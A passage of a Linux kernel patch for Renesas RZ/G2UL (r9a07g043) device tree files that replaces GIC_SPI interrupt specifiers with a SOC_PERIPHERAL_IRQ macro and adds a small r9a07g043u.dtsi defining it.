++				     <SOC_PERIPHERAL_IRQ(394) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF2_CLK_PCK>;
+@@ -302,12 +296,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c400 0 0x400>;
+-			interrupts = <GIC_SPI 395 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 397 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 398 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 396 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 399 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 399 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(395) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(397) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(398) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(396) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(399) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(399) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF3_CLK_PCK>;
+@@ -321,12 +315,12 @@
+ 			compatible = "renesas,scif-r9a07g043",
+ 				     "renesas,scif-r9a07g044";
+ 			reg = <0 0x1004c800 0 0x400>;
+-			interrupts = <GIC_SPI 400 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 402 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 403 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 401 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 404 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 404 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(400) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(402) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(403) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(401) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(404) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(404) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi",
+ 					  "bri", "dri", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCIF4_CLK_PCK>;
+@@ -339,10 +333,10 @@
+ 		sci0: serial@1004d000 {
+ 			compatible = "renesas,r9a07g043-sci", "renesas,sci";
+ 			reg = <0 0x1004d000 0 0x400>;
+-			interrupts = <GIC_SPI 405 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 406 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 407 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 408 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(405) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(406) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(407) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(408) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCI0_CLKP>;
+ 			clock-names = "fck";
+@@ -354,10 +348,10 @@
+ 		sci1: serial@1004d400 {
+ 			compatible = "renesas,r9a07g043-sci", "renesas,sci";
+ 			reg = <0 0x1004d400 0 0x400>;
+-			interrupts = <GIC_SPI 409 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 410 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 411 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 412 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(409) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(410) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(411) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(412) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "eri", "rxi", "txi", "tei";
+ 			clocks = <&cpg CPG_MOD R9A07G043_SCI1_CLKP>;
+ 			clock-names = "fck";
+@@ -369,14 +363,14 @@
+ 		canfd: can@10050000 {
+ 			compatible = "renesas,r9a07g043-canfd", "renesas,rzg2l-canfd";
+ 			reg = <0 0x10050000 0 0x8000>;
+-			interrupts = <GIC_SPI 426 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 427 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 422 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 424 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 428 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 423 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 425 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 429 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(426) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(427) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(422) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(424) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(428) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(423) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(425) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(429) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "g_err", "g_recc",
+ 					  "ch0_err", "ch0_rec", "ch0_trx",
+ 					  "ch1_err", "ch1_rec", "ch1_trx";
+@@ -405,14 +399,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058000 0 0x400>;
+-			interrupts = <GIC_SPI 350 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 348 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 349 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 353 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 351 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 354 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 355 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(350) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(348) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(349) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(352) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(353) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(351) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(354) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(355) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C0_PCLK>;
+@@ -427,14 +421,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058400 0 0x400>;
+-			interrupts = <GIC_SPI 358 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 356 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 357 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 360 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 361 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 359 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 362 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 363 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(358) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(356) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(357) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(360) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(361) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(359) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(362) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(363) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C1_PCLK>;
+@@ -449,14 +443,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058800 0 0x400>;
+-			interrupts = <GIC_SPI 366 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 364 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 365 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 368 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 369 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 367 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 370 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 371 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(366) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(364) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(365) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(368) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(369) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(367) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(370) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(371) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C2_PCLK>;
+@@ -471,14 +465,14 @@
+ 			#size-cells = <0>;
+ 			compatible = "renesas,riic-r9a07g043", "renesas,riic-rz";
+ 			reg = <0 0x10058c00 0 0x400>;
+-			interrupts = <GIC_SPI 374 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 372 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 373 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 376 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 377 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 375 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 378 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 379 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(374) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(372) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(373) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(376) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(377) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(375) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(378) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(379) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "tei", "ri", "ti", "spi", "sti",
+ 					  "naki", "ali", "tmoi";
+ 			clocks = <&cpg CPG_MOD R9A07G043_I2C3_PCLK>;
+@@ -491,7 +485,7 @@
+ 		adc: adc@10059000 {
+ 			compatible = "renesas,r9a07g043-adc", "renesas,rzg2l-adc";
+ 			reg = <0 0x10059000 0 0x400>;
+-			interrupts = <GIC_SPI 347 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(347) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_ADC_ADCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_ADC_PCLK>;
+ 			clock-names = "adclk", "pclk";
+@@ -551,10 +545,10 @@
+ 		sysc: system-controller@11020000 {
+ 			compatible = "renesas,r9a07g043-sysc";
+ 			reg = <0 0x11020000 0 0x10000>;
+-			interrupts = <GIC_SPI 42 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 43 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 44 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 45 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(42) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(43) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(44) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(45) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "lpm_int", "ca55stbydone_int",
+ 					  "cm33stbyr_int", "ca55_deny";
+ 			status = "disabled";
+@@ -578,23 +572,23 @@
+ 				     "renesas,rz-dmac";
+ 			reg = <0 0x11820000 0 0x10000>,
+ 			      <0 0x11830000 0 0x10000>;
+-			interrupts = <GIC_SPI 141 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 125 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 126 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 127 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 128 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 129 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 130 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 131 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 132 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 133 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 134 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 135 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 136 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 137 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 138 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 139 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 140 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(141) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(125) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(126) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(127) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(128) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(129) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(130) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(131) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(132) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(133) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(134) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(135) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(136) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(137) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(138) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(139) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(140) IRQ_TYPE_EDGE_RISING>;
+ 			interrupt-names = "error",
+ 					  "ch0", "ch1", "ch2", "ch3",
+ 					  "ch4", "ch5", "ch6", "ch7",
+@@ -623,8 +617,8 @@
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+ 			reg = <0x0 0x11c00000 0 0x10000>;
+-			interrupts = <GIC_SPI 104 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 105 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(104) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(105) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_SDHI0_IMCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI0_CLK_HS>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI0_IMCLK2>,
+@@ -639,8 +633,8 @@
+ 			compatible = "renesas,sdhi-r9a07g043",
+ 				     "renesas,rcar-gen3-sdhi";
+ 			reg = <0x0 0x11c10000 0 0x10000>;
+-			interrupts = <GIC_SPI 106 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 107 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(106) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(107) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_SDHI1_IMCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI1_CLK_HS>,
+ 				 <&cpg CPG_MOD R9A07G043_SDHI1_IMCLK2>,
+@@ -655,9 +649,9 @@
+ 			compatible = "renesas,r9a07g043-gbeth",
+ 				     "renesas,rzg2l-gbeth";
+ 			reg = <0 0x11c20000 0 0x10000>;
+-			interrupts = <GIC_SPI 84 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 86 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(84) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(85) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(86) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "mux", "fil", "arp_ns";
+ 			phy-mode = "rgmii";
+ 			clocks = <&cpg CPG_MOD R9A07G043_ETH0_CLK_AXI>,
+@@ -675,9 +669,9 @@
+ 			compatible = "renesas,r9a07g043-gbeth",
+ 				     "renesas,rzg2l-gbeth";
+ 			reg = <0 0x11c30000 0 0x10000>;
+-			interrupts = <GIC_SPI 87 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 88 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 89 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(87) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(88) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(89) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "mux", "fil", "arp_ns";
+ 			phy-mode = "rgmii";
+ 			clocks = <&cpg CPG_MOD R9A07G043_ETH1_CLK_AXI>,
+@@ -705,7 +699,7 @@
+ 		ohci0: usb@11c50000 {
+ 			compatible = "generic-ohci";
+ 			reg = <0 0x11c50000 0 0x100>;
+-			interrupts = <GIC_SPI 91 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(91) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>,
+@@ -719,7 +713,7 @@
+ 		ohci1: usb@11c70000 {
+ 			compatible = "generic-ohci";
+ 			reg = <0 0x11c70000 0 0x100>;
+-			interrupts = <GIC_SPI 96 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(96) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>,
+@@ -733,7 +727,7 @@
+ 		ehci0: usb@11c50100 {
+ 			compatible = "generic-ehci";
+ 			reg = <0 0x11c50100 0 0x100>;
+-			interrupts = <GIC_SPI 92 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(92) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>,
+@@ -748,7 +742,7 @@
+ 		ehci1: usb@11c70100 {
+ 			compatible = "generic-ehci";
+ 			reg = <0 0x11c70100 0 0x100>;
+-			interrupts = <GIC_SPI 97 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(97) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>,
+@@ -764,7 +758,7 @@
+ 			compatible = "renesas,usb2-phy-r9a07g043",
+ 				     "renesas,rzg2l-usb2-phy";
+ 			reg = <0 0x11c50200 0 0x700>;
+-			interrupts = <GIC_SPI 94 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(94) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H0_HCLK>;
+ 			resets = <&phyrst 0>;
+@@ -777,7 +771,7 @@
+ 			compatible = "renesas,usb2-phy-r9a07g043",
+ 				     "renesas,rzg2l-usb2-phy";
+ 			reg = <0 0x11c70200 0 0x700>;
+-			interrupts = <GIC_SPI 99 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(99) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2H1_HCLK>;
+ 			resets = <&phyrst 1>;
+@@ -790,10 +784,10 @@
+ 			compatible = "renesas,usbhs-r9a07g043",
+ 				     "renesas,rza2-usbhs";
+ 			reg = <0 0x11c60000 0 0x10000>;
+-			interrupts = <GIC_SPI 100 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 101 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 102 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 103 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(100) IRQ_TYPE_EDGE_RISING>,
++				     <SOC_PERIPHERAL_IRQ(101) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(102) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(103) IRQ_TYPE_LEVEL_HIGH>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_USB_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_USB_U2P_EXR_CPUCLK>;
+ 			resets = <&phyrst 0>,
+@@ -812,8 +806,8 @@
+ 			clocks = <&cpg CPG_MOD R9A07G043_WDT0_PCLK>,
+ 				 <&cpg CPG_MOD R9A07G043_WDT0_CLK>;
+ 			clock-names = "pclk", "oscclk";
+-			interrupts = <GIC_SPI 49 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 50 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts = <SOC_PERIPHERAL_IRQ(49) IRQ_TYPE_LEVEL_HIGH>,
++				     <SOC_PERIPHERAL_IRQ(50) IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "wdt", "perrout";
+ 			resets = <&cpg R9A07G043_WDT0_PRESETN>;
+ 			power-domains = <&cpg>;
+@@ -839,7 +833,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801000 0x0 0x400>;
+-			interrupts = <GIC_SPI 46 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(46) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM0_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM0_PRESETZ>;
+ 			power-domains = <&cpg>;
+@@ -850,7 +844,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801400 0x0 0x400>;
+-			interrupts = <GIC_SPI 47 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(47) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM1_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM1_PRESETZ>;
+ 			power-domains = <&cpg>;
+@@ -861,7 +855,7 @@
+ 			compatible = "renesas,r9a07g043-ostm",
+ 				     "renesas,ostm";
+ 			reg = <0x0 0x12801800 0x0 0x400>;
+-			interrupts = <GIC_SPI 48 IRQ_TYPE_EDGE_RISING>;
++			interrupts = <SOC_PERIPHERAL_IRQ(48) IRQ_TYPE_EDGE_RISING>;
+ 			clocks = <&cpg CPG_MOD R9A07G043_OSTM2_PCLK>;
+ 			resets = <&cpg R9A07G043_OSTM2_PRESETZ>;
+ 			power-domains = <&cpg>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+new file mode 100644
+index 0000000000000..96f935bc2d4d1
+--- /dev/null
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u.dtsi
+@@ -0,0 +1,12 @@
++// SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
++/*
++ * Device Tree Source for the RZ/G2UL SoC
++ *
++ * Copyright (C) 2022 Renesas Electronics Corp.
++ */
++
++#include <dt-bindings/interrupt-controller/arm-gic.h>
++
++#define SOC_PERIPHERAL_IRQ(nr)		GIC_SPI nr
++
++#include "r9a07g043.dtsi"
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts b/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
+index 059885a01ede9..01483b4302c25 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
++++ b/arch/arm64/boot/dts/renesas/r9a07g043u11-smarc.dts
+@@ -17,7 +17,7 @@
+ #define SW_SW0_DEV_SEL	1
+ #define SW_ET0_EN_N	1
+ 
+-#include "r9a07g043.dtsi"
++#include "r9a07g043u.dtsi"
+ #include "rzg2ul-smarc-som.dtsi"
+ #include "rzg2ul-smarc.dtsi"
+ 
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+index 2283d4fb87363..7dbf6a6292f49 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g044.dtsi
+@@ -174,9 +174,8 @@
